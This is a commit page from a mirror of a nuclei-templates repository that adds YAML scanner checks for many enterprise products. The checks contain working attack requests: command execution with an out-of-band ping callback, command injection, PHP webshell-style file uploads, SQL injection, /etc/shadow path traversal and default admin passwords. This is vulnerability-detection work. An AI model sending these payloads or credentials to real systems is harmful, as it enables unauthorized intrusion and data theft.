daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added some Templates

patch-1
SleepingBag945 2023-08-18 05:22:06 +02:00
parent 744ec172b1
commit a8d056b7aa
124 changed files with 4628 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

43
http/default-logins/d-link/d-link-ac-centralized-management-system-default-login.yaml Executable file
View File

@ -0,0 +1,43 @@
id: d-link-ac-centralized-management-system-default-login
info:
name: D-Link AC Centralized management system Default weak password
author: SleepingBag945
severity: medium
description: |
Access to sensitive information
metadata:
fofa-query: title="AC集中管理平台" && body="D-Link路由器管理页"
tags: Default weak password
http:
- raw:
- |
POST /login.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user=admin&password=admin
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && !contains(body_1,"flag=0")'
condition: and
- type: word
part: header
words:
- "Set-Cookie"
- "ac_userid"
condition: and
- type: word
part: body
words:
- "window.open"
condition: and

34
http/default-logins/o2oa/o2oa-default-login.yaml Executable file
View File

@ -0,0 +1,34 @@
id: o2oa-default-login
info:
name: O2OA Default Login
author: SleepingBag945
severity: critical
description: O2O存在默认密码xadmin/o2,登录后台可执行系统命令
tags: o2oa,default-login
http:
- raw:
- |
POST /x_organization_assemble_authentication/jaxrs/authentication/captcha HTTP/1.1
Host: {{Hostname}}
Cookie: x-token=anonymous
Authorization: anonymous
Accept: text/html,application/json,*/*
Content-Type: application/json; charset=UTF-8
{"credential":"xadmin","password":"o2"}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "\"type\": \"success\""
- "distinguishedName"
part: body
condition: and
# 执行命令看这里 http://wiki.peiqi.tech/wiki/oa/O2OA/O2OA%20invoke%20后台远程命令执行漏洞%20CNVD-2020-18740.html

29
http/default-logins/others/cnzxsoft-information-security-management-system-default-account.yaml Executable file
View File

@ -0,0 +1,29 @@
id: cnzxsoft-information-security-management-system-default-login
info:
name: cnzxsoft information security management system default account
author: SleepingBag945
severity: high
description: |
cnzxsoft Golden Shield Information Security Management System has a default weak password.
tags: default
http:
- raw:
- |
POST /?q=common/login HTTP/1.1
Host: {{Hostname}}
Cookie: check_code=ptbh
Content-Type: application/x-www-form-urlencoded
name=admin&password=zxsoft1234!%40%23%24&checkcode=ptbh&doLoginSubmit=1
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && contains(body_1,"1") && contains(header_1,"ZXSOFT_JDIS_USR_NAME=deleted") && !contains(body_1,"userpwd_error")'
condition: and
#zxsoft1234!@#$
#验证码能绕过,直接登录即可

32
http/default-logins/others/supershell-default-login.yaml Normal file
View File

@ -0,0 +1,32 @@
id: supershell-default-login
info:
name: supershell 默认密码
author: SleepingBag945
severity: high
description: |
Supershell 是一个通过 WEB 服务访问的 C2 远控平台。SuperShell 存在默认口令漏洞,可通过 tdragon6:tdragon6 登陆获取系统权限。
reference:
- https://github.com/tdragon6/Supershell
tags: supershell
http:
- raw:
- |
POST /supershell/login/auth HTTP/1.1
Host: {{Hostname}}
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.127 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
{"username":"tdragon6","password":"tdragon6"}
matchers:
- type: dsl
dsl:
- status_code_1 == 200 && !contains(body_1,"failed")
- contains(header_1,"token=ey") && contains(body_1,"success")
condition: and

34
http/default-logins/tp-link/tp-link-tl-r470gp-ac-default-login.yaml Executable file
View File

@ -0,0 +1,34 @@
id: tp-link-tl-r470gp-ac-default-login
info:
name: TP-LINK TL-R470GP-AC Default weak password
author: SleepingBag945
severity: high
description: |
TP-LINK TL-R470GP-AC 默认口令123456
metadata:
fofa-query: title="TL-R470GP-AC"
tags: tp-link,default-login,ac
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: close
{"method":"do","login":{"username":"admin","password":"0KcgeXhc9TefbwK"}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\"stok\""
- "\"error_code\":0"
condition: and

29
http/vulnerabilities/landray/landray-oa-datajson-rce.yaml Executable file
View File

@ -0,0 +1,29 @@
id: landray-oa-datajson-rce
info:
name: Landray-OA - s_bean sysFormulaSimulateByJS RCE
author: SleepingBag945
severity: critical
description: Landray-OA s_bean sysFormulaSimulateByJS RCE
reference:
- https://github.com/k3sc/Landray-oa-rce-1/blob/main/poc.py
metadata:
fofa-query: app="Landray-OA系统"
tags: landray,rce
http:
- raw:
- |
GET /data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=%66%75%6e%63%74%69%6f%6e%20%74%65%73%74%28%29%7b%20%72%65%74%75%72%6e%20%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%7d%3b%72%3d%74%65%73%74%28%29%3b%72%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%70%69%6e%67%20%2d%63%20%34%20{{interactsh-url}}%22%29&type=1 HTTP/1.1
Host: {{Hostname}}
Accept: */*
Connection:close
matchers:
- type: word
part: interactsh_protocol
name: http
words:
- "dns"
- "http"

32
http/vulnerabilities/landray/landray-oa-erp-data-rce.yaml Executable file
View File

@ -0,0 +1,32 @@
id: landray-oa-erp-data-rce
info:
name: Landray-OA - erp_data.jsp RCE
author: SleepingBag945
severity: critical
description: Landray-OA - erp_data.jsp RCE
reference:
- https://cn-sec.com/archives/1249492.html
metadata:
fofa-query: app="Landray-OA系统"
tags: landray,rce
http:
- raw:
- |
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
var={"body":{"file":"/tic/core/resource/js/erp_data.jsp"}}&erpServcieName=sysFormulaValidate&script=Runtime.getRuntime().exec("ping -c 4 {{interactsh-url}}");
matchers:
- type: word
part: interactsh_protocol
name: http
words:
- "dns"
- "http"

37
http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml Executable file
View File

File diff suppressed because one or more lines are too long

37
http/vulnerabilities/landray/landray-oa-treexml-rce.yaml Executable file
View File

File diff suppressed because one or more lines are too long

32
http/vulnerabilities/other/acenet-acereporter-report-component-arbitrary-file-download.yaml Executable file
View File

@ -0,0 +1,32 @@
id: acenet-acereporter-report-component-arbitrary-file-download
info:
name: AceNet AceReporter Report component Arbitrary file download
author: SleepingBag945
severity: medium
description: |
The vulnerability of arbitrary file download or read is mainly caused by the fact that when the application system provides the function of file download or read, the application system directly specifies the file path in the file path parameter without verifying the validity of the file path. As a result, the attacker can jump through the directory to download or read a file beyond the original specified path.
The attacker can finally download or read any files on the system through this vulnerability, such as database files, application system source code, password configuration information and other important sensitive information, resulting in sensitive information leakage of the system.
metadata:
fofa-query: title="Login @ Reporter" || title="Technology, Inc."
tags: file download
http:
- raw:
- |
GET /view/action/download_file.php?filename=../../../../../../../../../etc/passwd&savename=data.txt HTTP/1.1
Host: {{Hostname}}
- |
GET /view/action/download_file.php?filename=../../../../../../../../../etc/hosts&savename=data.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body_1,"root") && contains(body_1,"daemon")'
- 'status_code_2 == 200 && contains(body_2,"127.0.0.1")'
condition: and

39
http/vulnerabilities/other/aic-intelligent-campus-system-password-leak.yaml Executable file
View File

@ -0,0 +1,39 @@
id: aic-intelligent-campus-system-password-leak
info:
name: AIC Intelligent Campus System Password Leak
author: SleepingBag945
severity: medium
description: |
Due to the design logic defects, the super password is leaked, which can kill more than 40 campus systems.<br>
metadata:
fofa-query: title="AIC智能校园系统"
tags: Disclosure of Sensitive Information
http:
- raw:
- |
GET /datacenter/dataOrigin.ashx?c=login HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200 && contains(body_1,"卡号") && contains(body_1,"密码")'
condition: and
extractors:
- type: regex # type of the extractor
name: username
part: body # part of the response (header,body,all)
group: 1
regex:
- "\"卡号\":\"(.*?)\"" # regex to use for extraction.
- type: regex # type of the extractor
name: passwd
part: body # part of the response (header,body,all)
group: 1
regex:
- "\"密码\":\"(.*?)\"" # regex to use for extraction.

27
http/vulnerabilities/other/aruba-instant-default-login.yaml Executable file
View File

@ -0,0 +1,27 @@
id: aruba-instant-default-login
info:
name: Aruba Instant password vulnerability
author: SleepingBag945
severity: medium
description: |
Aruba Instant is an AP device. The device has a default password, and attackers can control the entire platform through the default password admin/admin vulnerability, and use administrator privileges to operate core functions.<br>
metadata:
fofa-query: body="jscripts/third_party/raphael-treemap.min.js" || body="jscripts/third_party/highcharts.src.js"
tags: default Password
http:
- raw:
- |
POST /swarm.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
opcode=login&user=admin&passwd=admin&refresh=false&nocache=0.17699820340903838
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && contains(body_1,"sid") && contains(body_1,"Admin")'
condition: and

25
http/vulnerabilities/other/avcon6-org-execl-download-arbitrary-file-download.yaml Executable file
View File

@ -0,0 +1,25 @@
id: avcon6-org-execl-download-arbitrary-file-download
info:
name: AVCON6 org_execl_download.action file down
author: SleepingBag945
severity: medium
description: |
华平软件视频会议 AVCON6 存在任意文件下载
metadata:
fofa-query: title="AVCON6"
tags: fileread
http:
- raw:
- |
GET /org_execl_download.action?filename=../../../../../../../../../../../../../etc/shadow HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && contains(body_1,"root:*:0")'
condition: and

27
http/vulnerabilities/other/ciphertrust-default-password-vulnerability.yaml Executable file
View File

@ -0,0 +1,27 @@
id: ciphertrust-default-password-vulnerability
info:
name: Ciphertrust default password vulnerability
author: SleepingBag945
severity: medium
description: |
Attackers can control the entire platform through the default password initpass vulnerability, and use administrator privileges to operate core functions.<br>
metadata:
fofa-query: cert="Ciphertrust" || fid="yHV5+ZZGMu0="
tags: default Password
http:
- raw:
- |
POST /api/v1/auth/tokens/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"username":"admin","connection":"local_account","password":"admin","grant_type":"password","refresh_token_revoke_unused_in":30,"cookies":true,"labels":["web-ui"]}
matchers:
- type: dsl
dsl:
- 'status_code_1 == 401 && contains(body_1,"code") && contains(body_1,"Password change required")'
condition: and

42
http/vulnerabilities/other/cloud-oa-system-sqli.yaml Normal file
View File

@ -0,0 +1,42 @@
id: cloud-oa-system-sqli
info:
name: Cloud OA system SQLi
author: SleepingBag945
severity: high
description: cloud OA system /OA/PM/svc.asmx page parameters are not properly filtered, resulting in a SQL injection vulnerability, which can be used to obtain sensitive information in the database.
tags: cloudoa,sqli
http:
- raw:
- |
POST /OA/PM/svc.asmx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: text/xml
Accept-Encoding: gzip, deflate
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetUsersInfo xmlns="http://tempuri.org/">
<userIdList>LOWER(CONVERT(VARCHAR(32),HashBytes('MD5','{{randstr}}'),2))</userIdList>
</GetUsersInfo>
</soap:Body>
</soap:Envelope>
matchers-condition: and
matchers:
- type: word
words:
- "System.Data.SqlClient.SqlException"
- "<?xml version="
- "{{md5('{{randstr}}')}}"
condition: and
- type: status
status:
- 500

33
http/vulnerabilities/other/cmseasy-crossall-act-sqli.yaml Executable file
View File

@ -0,0 +1,33 @@
id: cmseasy-crossall-act-sqli
info:
name: CmsEasy crossall_act.php SQL injection vulnerability
author: SleepingBag945
severity: high
description: |
CmsEasy 存在SQL注入漏洞通过文件 service.php 加密SQL语句执行即可执行任意SQL命令
metadata:
fofa-query: app="CmsEasy"
tags: sqli
http:
- raw:
- |
GET /?case=crossall&act=execsql&sql=WY8gzSfZwW9R5YvyK HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0(X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
matchers-condition: and
matchers:
- type: word
words:
- '{"123":"123"}'
part: body
- type: status
status:
- 200
# https://www.zilyun.com/44962.html

34
http/vulnerabilities/other/consul-rexec-rce.yaml Executable file
View File

@ -0,0 +1,34 @@
id: consul-rexec-rce
info:
name: Consul Rexec RCE
author: SleepingBag945
severity: critical
description: |
Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request.
metadata:
fofa-query: protocol="consul(http)"
tags: rce
http:
- raw:
- |
GET /v1/agent/self HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- '"EnableRemoteScriptChecks":true'
condition: and
- type: status
status:
- 200
# msf
# search Hashicorp
# exploit/multi/misc/consul_service_exec

35
http/vulnerabilities/other/consul-service-rce.yaml Executable file
View File

@ -0,0 +1,35 @@
id: consul-service-rce
info:
name: consul-service-rce
author: SleepingBag945
severity: critical
description: |
Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request.
metadata:
fofa-query: protocol="consul(http)"
tags: rce
http:
- raw:
- |
GET /v1/agent/self HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "\"EnableScriptChecks\": true"
- "\"EnableRemoteScriptChecks\": true"
condition: or
- type: status
status:
- 200
# msf
# search Hashicorp
# exploit/multi/misc/consul_service_exec

29
http/vulnerabilities/other/h2console-unauth.yaml Executable file
View File

@ -0,0 +1,29 @@
id: h2console-unauth
info:
name: H2 Console Web Login Panel - unauth
author: SleepingBag945
severity: medium
description: H2 Console Web login panel was detected.
reference:
- https://blog.csdn.net/weixin_45366453/article/details/125525496
- https://blog.csdn.net/zy15667076526/article/details/111413979
metadata:
shodan-query: http.title:"H2 Console"
tags: unauth,h2,console
http:
- method: GET
path:
- '{{BaseURL}}/h2-console/login.jsp'
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(body, 'Welcome to H2')"
- "contains(body, 'H2 Console')"
condition: and
# Enhanced by md on 2022/11/16

33
http/vulnerabilities/other/huiwen-bibliographic-search-system-info-leak.yaml Executable file
View File

@ -0,0 +1,33 @@
id: huiwen-bibliographic-search-system-info-leak
info:
name: 汇文 图书馆书目检索系统 config.properties 信息泄漏漏洞
author: SleepingBag945
severity: high
description: 汇文 图书馆书目检索系统 /include/config.properties 文件中包含敏感信息,攻击者可以直接访问获取信息
tags: huiwen
http:
- raw:
- |
GET /include/config.properties HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "host="
- "port="
- "user="
- "password="
part: body
condition: and
- type: status
status:
- 200
# http://wiki.peiqi.tech/wiki/webapp/%E6%B1%87%E6%96%87/%E6%B1%87%E6%96%87%20%E5%9B%BE%E4%B9%A6%E9%A6%86%E4%B9%A6%E7%9B%AE%E6%A3%80%E7%B4%A2%E7%B3%BB%E7%BB%9F%20config.properties%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.html

41
http/vulnerabilities/other/kemai-ras-ultra-vires-access.yaml Executable file
View File

@ -0,0 +1,41 @@
id: kemai-ras-ultra-vires-access
info:
name: 科迈 RAS系统 Cookie验证越权漏洞
author: SleepingBag945
severity: high
description: 科迈 RAS系统 存在Cookie验证越权当 RAS_Admin_UserInfo_UserName 设置为 admin 时可访问后台
tags: ras,kemai
http:
- raw:
- |
GET /Server/CmxUser.php?pgid=UserList HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
cookie: RAS_Admin_UserInfo_UserName={{randstr}}
Accept-Encoding: gzip
matchers-condition: and
matchers:
- type: word
words:
- "\"?pgid=User_Show"
- "usingeKey"
- "MachineAmount"
- "AppLoginType"
- "TimeType"
part: body
condition: and
- type: status
status:
- 200
# http://wiki.peiqi.tech/wiki/webapp/%E7%A7%91%E8%BF%88/%E7%A7%91%E8%BF%88%20RAS%E7%B3%BB%E7%BB%9F%20Cookie%E9%AA%8C%E8%AF%81%E8%B6%8A%E6%9D%83%E6%BC%8F%E6%B4%9E.html

41
http/vulnerabilities/other/kingdee-apusic-directory-traversal.yaml Executable file
View File

@ -0,0 +1,41 @@
id: kingdee-apusic-directory-traversal
info:
name: Kingdee Apusic - Local File Inclusion
author: SleepingBag945
severity: medium
description: Kingdee Apusic server_file is vulnerable to local file inclusion and can allow attackers to obtain sensitive server information.
reference:
- http://wiki.peiqi.tech/wiki/oa/%E9%87%91%E8%9D%B6OA/%E9%87%91%E8%9D%B6OA%20Apusic%E5%BA%94%E7%94%A8%E6%9C%8D%E5%8A%A1%E5%99%A8-%E4%B8%AD%E9%97%B4%E4%BB%B6%20server_file%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
tags: kingdee,lfi,traversal
http:
- method: GET
path:
- "{{BaseURL}}/admin/protected/selector/server_file/files?folder=C://&suffix="
- "{{BaseURL}}/admin/protected/selector/server_file/files?folder=/&suffix="
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"name":"Windows","path":"C:\\\\Windows","folder":true}'
- '{"name":"root","path":"/root","folder":true}'
condition: or
- type: word
words:
- "application/json"
part: header
- type: status
status:
- 200
# Enhanced by mp on 2022/08/03

46
http/vulnerabilities/other/sanhui-smg-file-read.yaml Executable file
View File

@ -0,0 +1,46 @@
id: sanhui-smg-file-read
info:
name: 三汇SMG 网关管理软件 down.php 任意文件读取漏洞
author: SleepingBag945
severity: high
description: 三汇SMG 网关管理软件 down.php文件中存在任意文件读取漏洞攻击者通过漏洞可以下载服务器任意文件
tags: sanhui-smg
http:
- raw:
- |
POST /down.php HTTP/1.1
Host: {{Hostname}}
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfA9vzLuw6Gmtnmv2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
------WebKitFormBoundaryfA9vzLuw6Gmtnmv2
Content-Disposition: form-data; name="downfile"
/etc/passwd
------WebKitFormBoundaryfA9vzLuw6Gmtnmv2
Content-Disposition: form-data; name="down"
下载
------WebKitFormBoundaryfA9vzLuw6Gmtnmv2
Content-Disposition: form-data; name="runinfoupdate"
------WebKitFormBoundaryfA9vzLuw6Gmtnmv2--
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
part: body
- type: status
status:
- 200

28
http/vulnerabilities/other/zhixiang-oa-msglog-sqli.yaml Executable file
View File

@ -0,0 +1,28 @@
id: zhixiang-oa-msglog-sqli
info:
name: zhixiang-oa-msglog-sqli
author: SleepingBag945
severity: high
description: 致翔OA msglog.aspx文件存在SQL注入漏洞攻击者通过漏洞可获取敏感信息
reference:
- http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E7%BF%94OA/%E8%87%B4%E7%BF%94OA%20msglog.aspx%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
tags: hongfan,oa,sqli
http:
- raw:
- |
GET /mainpage/msglog.aspx?user=1%27%20and%201=convert(int,(select%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27127381%27))))-- HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_1 == 500 && contains(body_1, "43f845fa0c8aef9104f8e1b07625ecf8")'
condition: and
# 可以试着sqlmap osshell

25
http/vulnerabilities/qax/unauthenticated-qax-vpn-access.yaml Executable file
View File

@ -0,0 +1,25 @@
id: unauthenticated-qax-vpn-access
info:
name: QAX-VPN - Authentication Bypass
author: unknwon
severity: critical
description: "QAX-VPN has unauthorized management user traversal and any account password modification."
reference:
- https://mp.weixin.qq.com/s/BlXK_EB6ImceX83MIJGKsA
tags: qan-vpn,unauth
metadata:
max-request: 1
http:
- method: GET
path:
- "{{BaseURL}}/admin/group/x_group.php?id=1"
headers:
Cookie: admin_id=1; gw_admin_ticket=1;
matchers:
- type: word
words:
- "javascript:RemoveUserFromList()"
part: body

40
http/vulnerabilities/realor/realor-gwt-system-sql-injection.yaml Normal file
View File

@ -0,0 +1,40 @@
id: realor-gwt-system-sql-injection
info:
name: 瑞友天翼应用虚拟化系统远程代码漏洞
author: SleepingBag945
severity: critical
description: 瑞友天翼应用虚拟化系统由于对用户传入的数据安全处理不当,导致存在 SQL 注入漏洞,远程且未经过授权认证的攻击者可利用此漏洞获取数据库里敏感信息,也可进一步写入 webshell 后门访问,攻击者从而可在目标服务器上执行任意恶意代码,获取系统权限。
tags: realor,sqli
http:
- raw:
- |
GET /ConsoleExternalUploadApi.XGI?key=FarmName&initParams=command_uploadAuthorizeKeyFile__user_admin%27-%27__pwd_password123__serverIdStr_1&sign=7627a11bf8f214451e7929f05299b9f6 HTTP/1.1
Host: {{Hostname}}
- |
GET /AgentBoard.XGI?user='||'1&cmd=UserLogin HTTP/1.1
Host: {{Hostname}}
- |
GET /Board.XGI HTTP/1.1
Cookie: PHPSESSID={{cookie}}
Host: {{Hostname}}
extractors:
- type: regex
name: cookie
internal: true
part: header
group: 1
regex:
- 'PHPSESSID=(.*?);'
matchers:
- type: dsl
dsl:
- contains(body_1,"未查询到符合条件的用户") || (contains(body_2,"CustomInfo") && contains(header_2,"PHPSESSID"))
- contains(body_3,"src=\"custom/")
condition: and

30
http/vulnerabilities/ruijie/ruijie-nbr-router-fileupload-upload.yaml Normal file
View File

@ -0,0 +1,30 @@
id: ruijie-nbr-router-fileupload-upload
info:
name: 锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞
author: SleepingBag945
severity: critical
description: 锐捷 NBR 路由器 fileupload.php文件存在任意文件上传漏洞攻击者通过漏洞可以上传任意文件到服务器获取服务器权限
tags: yonyou
http:
- raw:
- |
POST /ddi/server/fileupload.php?uploadDir=upload&name={{randstr_2}}.php HTTP/1.1
Host: {{Hostname}}
Accept: text/plain, */*; q=0.01
Content-Disposition: form-data; name="file"; filename="111.php"
Content-Type: image/jpeg
<?php echo "{{randstr_1}}"; unlink(__FILE__); ?>
- |
GET /ddi/server/upload/{{randstr_2}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code_1 == 200
- status_code_2 == 200 && contains(body_2,"{{randstr_1}}")
condition: and

29
http/vulnerabilities/sangfor/sangfor-ad-rce.yaml Normal file
View File

@ -0,0 +1,29 @@
id: sangfor-ad-rce
info:
name: 深信服应用交付管理统远程命令执行
author: SleepingBag945
severity: critical
description: 深信服应用交付管理系统远程命令执行
tags: sangfor,ad,rce
http:
- raw:
- |
POST /rep/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
clsMode=cls_mode_login%0Aid%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- status_code_1 == 200
- contains(body_1,'uid=')
condition: and

56
http/vulnerabilities/secworld/secworld-secgate-3600-firewall-upload.yaml Normal file
View File

@ -0,0 +1,56 @@
id: secworld-secgate-3600-firewall-upload
info:
name: secworld-secgate-3600-firewall-upload
author: SleepingBag945
severity: critical
description: 网神防火墙obj_app_upfile任意文件上传
reference:
- https://peiqi.wgpsec.org/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E7%A5%9E%20SecGate%203600%20%E9%98%B2%E7%81%AB%E5%A2%99%20obj_app_upfile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
tags: secworld
http:
- raw:
- |
POST /?g=obj_app_upfile HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr_3}}
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
------WebKitFormBoundary{{randstr_3}}
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10000000
------WebKitFormBoundary{{randstr_3}}
Content-Disposition: form-data; name="upfile"; filename="{{randstr_1}}.php"
Content-Type: text/plain
<?php echo "{{randstr_2}}"; unlink(__FILE__); ?>
------WebKitFormBoundary{{randstr_3}}
Content-Disposition: form-data; name="submit_post"
obj_app_upfile
------WebKitFormBoundary{{randstr_3}}
Content-Disposition: form-data; name="__hash__"
0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundary{{randstr_3}}--
- |
GET /attachements/{{randstr_1}}.php HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- status_code_1 == 302
- status_code_2 == 200 && contains(body_2,'{{randstr_2}}')
condition: and

40
http/vulnerabilities/seeyon/seeyon-ajax-unauth.yaml Executable file
View File

@ -0,0 +1,40 @@
id: seeyon-ajax-unauth
info:
name: Seeyon AJAX Unauthoried Access
author: pikpikcu
severity: high
description: 接口未授权访问可调用文件上传接口上传webshell。
reference:
- https://buaq.net/go-53721.html
- https://mp.weixin.qq.com/s/bHKDSF7HWsAgQi9rTagBQA
- http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20ajax.do%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%20CNVD-2021-01627.html
metadata:
verified: true
fofa-query: app="致远互联-OA"
tags: misconfig,seeyon,unauth,ajax
http:
- raw:
- |
POST /seeyon/thirdpartyController.do.css/..;/ajax.do HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
- |
GET /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && contains(body_1, "java.lang.NullPointerException:null")'
- 'status_code_2 == 200 && contains(body_2,"companyName")'
condition: and

31
http/vulnerabilities/seeyon/seeyon-oa-a6-config-jsp-info-leak.yaml Executable file
View File

@ -0,0 +1,31 @@
id: seeyon-oa-a6-config-jsp-info-leak
info:
name: seeyon-oa a6 config.jsp user info leak
author: SleepingBag945
severity: medium
description: 致远OA A6 config.jsp 敏感信息泄漏
reference:
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
tags: seeyon,oa
http:
- raw:
- |
GET /yyoa/ext/trafaxserver/SystemManage/config.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "DatabaseName"
- type: word
words:
- "请在文本框内配置传真插件所需服务器的信息"
- type: status
status:
- 200
# Enhanced by cs on 2022/07/05

31
http/vulnerabilities/seeyon/seeyon-oa-a6-createMysql-info-leak.yaml Executable file
View File

@ -0,0 +1,31 @@
id: seeyon-oa-a6-createMysql-user-info-leak
info:
name: seeyon-oa a6 createMysql user info leak
author: SleepingBag945
severity: medium
description: 致远OA A6 createMysql.jsp 数据库敏感信息泄露
reference:
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
tags: seeyon,oa
http:
- raw:
- |
GET /yyoa/createMysql.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "root</br>"
- type: regex
regex:
- "[*][0-zA-Z]{40}</br>"
- type: status
status:
- 200
# Enhanced by cs on 2022/07/05

31
http/vulnerabilities/seeyon/seeyon-oa-a6-initDataAssess-user-info-leak.yaml Executable file
View File

@ -0,0 +1,31 @@
id: seeyon-oa-a6_initDataAssess-user-info-leak
info:
name: seeyon-oa a6 initDataAssess user info leak
author: SleepingBag945
severity: medium
description: 致远OA A6 initDataAssess.jsp 用户敏感信息泄露
reference:
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
tags: seeyon,oa
http:
- raw:
- |
GET /yyoa/assess/js/initDataAssess.jsp HTTP/1.1
Host: {{Hostname}}
